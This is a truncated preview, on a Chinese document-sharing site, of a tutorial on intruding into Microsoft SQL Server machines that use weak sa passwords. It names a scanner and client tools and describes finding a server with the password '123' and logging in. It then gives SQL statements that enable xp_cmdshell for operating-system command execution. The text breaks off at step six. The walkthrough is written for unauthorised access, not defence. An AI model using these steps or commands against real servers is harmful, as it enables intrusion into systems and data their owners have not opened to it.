- 3
- 0
- 约 9页
- 2016-10-22 发布于贵州
- 举报
使用SQL弱口入侵SQL服务器的探讨
使用SQL弱口令入侵SQL服务器
使用的工具:扫描工具X-scan
??????????????????????? SQL查询分析器
??????????????????????? SQLtools命令集成版
环境:Windows xp和Windows Server 2003企业版
1、在网络内扫描到一台SQL Server服务器,且sa密码为弱口令123
2、通过 SQLtools命令集成版这个软件,我们可以连上这台SQL Server服务器,如下图所示
3、虽然我们能succeed连接到SQL Server服务器,但是在我们执行dir c:\查看c盘文件时候,可能会报错,基于这种情况,我们可以使用SQL 查询分析器,修正该错误信息
4、打开SQL Server查询分析器,输入IP地址和sa帐号及密码
5、在查询分析器里输入SQL语句,并执行
SQL语句:
;EXEC sp_configure show advanced options, 1 --
;RECONFIGURE WITH OVERRIDE --
;EXEC sp_configure xp_cmdshell, 1 --
;RECONFIGURE WITH OVERRIDE --
;EXEC sp_configure?? show advanced options, 0 --
6、这时,我们在执行d
您可能关注的文档
- 众智smartenHGM8130发电机组自动化控制器说明书.doc
- 众智软件--设院数字图书馆系统介绍.doc
- 优秀教学案例《变革的时代》马全玲.doc
- 优秀的照明设计必须具备6项技能.docx
- 优思网校:205年杭州市科学中考试卷.doc
- 优词网的实时查功能简介.doc
- 优质花生收获机农业机械花生收获机价格.docx
- 会计09班_KngFZ_公司数据.doc
- 会计从业资格考试题及答案解析(2017年改革版).docx
- 会计作业答案2150421.docx
- 2024-2025学年湖南省邵阳市新宁县回龙寺镇人教版一年级下册期中测试数学试卷.docx
- 2024-2025学年山东省德州市平原县王杲铺中小、王凤楼中小、腰站镇中小青岛版一年级下册3月月考数学试卷.docx
- 第四单元 课题3 物质组成的表示-初中化学新教材预习学案(人教版2024九年级上册).docx
- 2024-2025学年山东省济宁市梁山县人教版一年级下册期中测试数学试卷.docx
- 2024-2025学年山东省德州市德州经济技术开发区长河小学等校青岛版一年级下册期中考试数学试卷.docx
- 2026《基于国产开源单片机GD32VF103的输变电设备物联网传感器设计》8300字.docx
- 2024年中考道德与法治真题完全解读(北京卷).docx
- 2026《基于机器视觉识别的工件边缘曲线重构方法分析》9000字.docx
- 课时9.4 物体的浮与沉【一大题型】八年级全一册物理(沪科版2024).docx
- 2024-2025学年广东省江门市开平市人教版一年级下册期中综合素养评价数学试卷.docx
最近下载
- 057 肖祥锐的心灵秘籍 心灵魔术教学书籍 中文 完整版_超级魔术学习系列.pdf VIP
- (高清版)DG∕TJ 08-2421-2023 装配式部分包覆钢-混凝土组合结构技术标准.pdf VIP
- 发热待查诊治专家共识(2026版)解读.pptx VIP
- (共108页PPT)7 全球联系的初步建立与世界格局的演变.pptx VIP
- The Principle of Auditing(西南财经)中国大学MOOC慕课 章节测验客观题答案.docx VIP
- 2024人教版九年级化学下册全册知识点总结.pdf VIP
- 波谱解析 核磁共振氢谱 HNMR.ppt VIP
- 往年高考英语听力真题.pdf VIP
- 《全球联系的初步建立与世界格局的演变》PPT课件.pptx VIP
- 具有假体腔的动物腹毛动物门轮形动物门动吻动物门线虫动物.PPT VIP
原创力文档

文档评论(0)